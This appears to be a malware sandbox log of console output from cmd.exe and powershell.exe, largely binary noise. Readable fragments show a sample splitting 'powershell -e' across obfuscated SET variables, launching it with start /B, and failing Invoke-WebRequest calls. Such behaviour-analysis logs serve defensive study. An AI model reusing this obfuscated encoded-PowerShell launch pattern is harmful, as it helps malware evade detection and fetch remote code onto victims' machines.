Source: C:\Windows\System32\cmd.exe	Console Write: ................<.......................................................................................................t.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.......................................................................................................X.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.......................................................................................................\.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............................d1..............................`.1..............f/w....C...............^.......B...............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............................d1......................................................O...............j.......B...............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.................................1w.....................8..91...........`.J....P>..............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.................................1w.....................:..91...........`.J....P>......................h.......`...............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.................................1w.....................=..91...........`.J....P>......................j.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.................................1w.....................?..91...........`.J....P>......................p.......p...............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.................................1w.....................>..91...........`.J....P>..............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............................>.1w........................91..`........`.J....P>...............................!..............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.................................1w........................91...........`.J....P>...............................$..............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............................p........................7..91....................................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............1.....2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............e.c.h.o..........%.J..................../.......................n_.J............8.1.............X%.J............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<.......................................................y2..91..e.c.h.o.........P>..............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<............... .&. ...........P>.......................2..91..................P>..............8.1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............s.t.a.r.t./.B...}..w............................D.......#.........................1............. .&. ...........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<........................................................2..91..s.t.a.r.........P>......................`.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............e.c.h.o.........P>......................I2..91..................P>................1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<........................................................2..91..e.c.h.o.........P>..............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<................................1.w.....................2..91..................P>..............h.1.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................<...............................>.1w.....................8..91..`........`.J....P>..............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................$.................................1w.....................8..91...........`.J....P>..............................@ ..............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................6.......6.....}..w.............................1......(.P..............3......................p9k.............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm................<.......Nk....}..w....p9k.....\.......................(.P.....x.................<.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9.......Nk......F.....(.P.....x...............H.<.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm................<.......Nk....}..w....p9k.....\.......................(.P.....x.................<.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x.......................b.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.....H.<.....L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......p9k.....}..w..............F.......Nk......F.....(.P.....x...............H.<.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9.......Nk......F.....(.P.....x...............H.<.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x.......................b.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.....H.<.....L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......p9k.....}..w..............F.......Nk......F.....(.P.....x...............H.<.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9.......Nk......F.....(.P.....x...............H.<.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................c.h.a.n.n.e.l...}..w..............F.......Nk......F.....(.P.....x...............H.<.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x.......................b.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.....H.<.....L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......p9k.....}..w..............F.......Nk......F.....(.P.....x...............H.<.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................o.c.c.u.r.r.e.d. .o.n. .a. .s.e.n.d.......Nk......F.....(.P.....x...............H.<.....&.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9.......Nk......F.....(.P.....x...............H.<.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x.......................b.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.....H.<.....L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......p9k.....}..w..............F.......Nk......F.....(.P.....x...............H.<.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9.......Nk......F.....(.P.....x...............H.<.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.....H.<.....L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......p9k.....}..w..............F.......Nk......F.....(.P.....x...............H.<.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................4...............4.................O...........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................4...............4.................O...........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................4...............4.................O...........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x.......................`.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................p9k.....}..w..............F.......Nk......F.....(.P.....x...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......p9k.....}..w..............F.......Nk......F.....(.P.....x...............H.<.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................X%.J....................~...91.....J..............8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............*.....2..................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.i.r............%.J..................../.........8..... .8.....n_.J......8.....x.*.............X%.J............
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .c.:.\. ...................................91..d.i.r...........P>8.............H.*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.........................91..................P>8.............x.*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w....................`...............v>........................*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................91..e.c.h.o.........P>8.............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.........................91..................P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........}..w....................`................>........................*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .h.j.h.d.r.d.r.e.s.a.s.=.p.o. .............91..S.E.T...........P>8...............*..... .......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.....................n...91..................P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w....................`................>......................X.*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................91..e.c.h.o.........P>8.....................h.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.........................91..................P>8.............X.*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........}..w....................`................>........................*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .Y.U.d.e.r.h.d.D.3.=.w.e.r.s. .........~...91..S.E.T...........P>8...............*..... .......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.........................91..................P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w....................`................>........................*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................91..e.c.h.o.........P>8.....................j.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.....................N...91..................P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........}..w....................`................>......................8.*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .V.v.d.s.F.H.d.4.=.h.e.l.l. .-.e. .....>...91..S.E.T...........P>8...............*.....$.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.........................91..................P>8.............8.*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w....................`................>........................*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................^...91..e.c.h.o.........P>8.....................p.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.........................91..................P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........}..w....................`................>......................x.*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................91..S.E.T...........P>8.............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.........................91..................P>8.............x.*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w....................`................?........................*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................91..e.c.h.o.........P>8.............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.........................91..................P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........}..w....................`................?........................*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................91..S.E.T...........P>8.............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.....................n...91..................P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w....................`...............?......................X.............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................91..e.c.h.o.........P>8.............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.........................91..................P>8.............X.*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........}..w....................`...............<?........................*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................~...91..S.E.T...........P>8.............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.........................91..................P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w....................`...............N?........................*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................91..e.c.h.o.........P>8.............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.....................N...91..................P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........P>8.....................N...91..................P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................91..S.E.T...........P>8.....................>.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................X..J....................^...91..:i.J............P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .V.o.l.u.m.e. .i.n. .d.r.i.v.e. .C. .h.a.s. .n.o. .l.a.b.e.l...........%.8............D.......B..............
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .V.o.l.u.m.e. .S.e.r.i.a.l. .N.u.m.b.e.r. .i.s. .2.0.A.2.-.D.C.6.8.....).8............H.......B..............
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................C4.....P...............12w....@......8.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .D.i.r.e.c.t.o.r.y. .o.f. .c.:.\.........8...............................8.....8.............B...............
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................................................................^.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................................................................................*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................................................................h.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................................................................................*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................................................................t.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................................................................X.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................................................................\.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................d1........................8.......*..............f/w....C.8.............^.......B...............
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................d1........................8.............................O.8.............j.......B...............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w........................91...........`.J....P>8...............................8.............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w........................91...........`.J....P>8.....................h.......`.8.............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w........................91...........`.J....P>8.....................j.........8.............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w........................91...........`.J....P>8.....................p.......p.8.............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w........................91...........`.J....P>8...............................9.............
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................>.1w........................91..`.4......`.J....P>8..............................!9.............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w........................91...........`.J....P>8..............................$9.............
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................p.......................~...91....................8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............*.....2..................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o..........%.J..................../.........9.......9.....n_.J......9.....x.*.............X%.J............
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................91..e.c.h.o.........P>8.............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>8.........................91..................P>8.............x.*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................s.t.a.r.t./.B...}..w....................`...............?@........................*............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................91..s.t.a.r.........P>8.....................`.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........P>8.........................91..................P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................91..e.c.h.o.........P>8.............................................
Source: C:\Windows\System32\cmd.exe	Console Write: .................................................1.w....................^...91..................P>8...............*.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................>.1w....................^...91..`.4......`.J....P>8...............................9.............
Source: C:\Windows\System32\cmd.exe	Console Write: ................p.................................1w........................91...........`.J....P>8.............................@ 9.............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................6.......6.....}..w.............................1......(.P..............3.......................rq.............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................pk....}..w.....rq.....\.......................(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9.......pk......].....(.P.....X.......`.......h.......$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................pk....}..w.....rq.....\.......................(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......].....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......].....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......].....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......].....(.P.....X.......`...............b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.....h.......L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........rq.....}..w.............6].......pk......].....(.P.....X.......`.......h...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9.......pk......\.....(.P.....X.......`.......h.......$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`...............b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.....h.......L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........rq.....}..w.............6].......pk......\.....(.P.....X.......`.......h...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9.......pk......\.....(.P.....X.......`.......h.......$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`...............b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........rq.....}..w.............6].......pk......\.....(.P.....X.......`.......h...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................c.h.a.n.n.e.l...}..w.............6].......pk......\.....(.P.....X.......`.......h...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9.......pk......\.....(.P.....X.......`.......h.......$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`...............b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.....h.......L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........rq.....}..w.............6].......pk......\.....(.P.....X.......`.......h...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................o.c.c.u.r.r.e.d. .o.n. .a. .s.e.n.d.......pk......\.....(.P.....X.......`.......h.......&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9.......pk......\.....(.P.....X.......`.......h.......$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`...............b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.....h.......L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........rq.....}..w.............6].......pk......\.....(.P.....X.......`.......h...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9.......pk......\.....(.P.....X.......`.......h.......$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.....h.......L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................rq.....}..w.............6].......pk......\.....(.P.....X.......`.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........rq.....}..w.............6].......pk......\.....(.P.....X.......`.......h...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................4...............4.................O...........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................4...............4.................O...........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................4...............4.................O...........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................4...............4.................O...........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................X%.J.....................:E.91.....J..............................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............0.....2..................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.i.r............%.J..................../............... .......n_.J............X.0.............X%.J............
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .c.:.\. ...............................W<E.91..d.i.r...........P>..............(.0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>.......................<E.91..h...............P>..............X.0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w.....................................M........................0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................<E.91..e.c.h.o.........P>..............................................
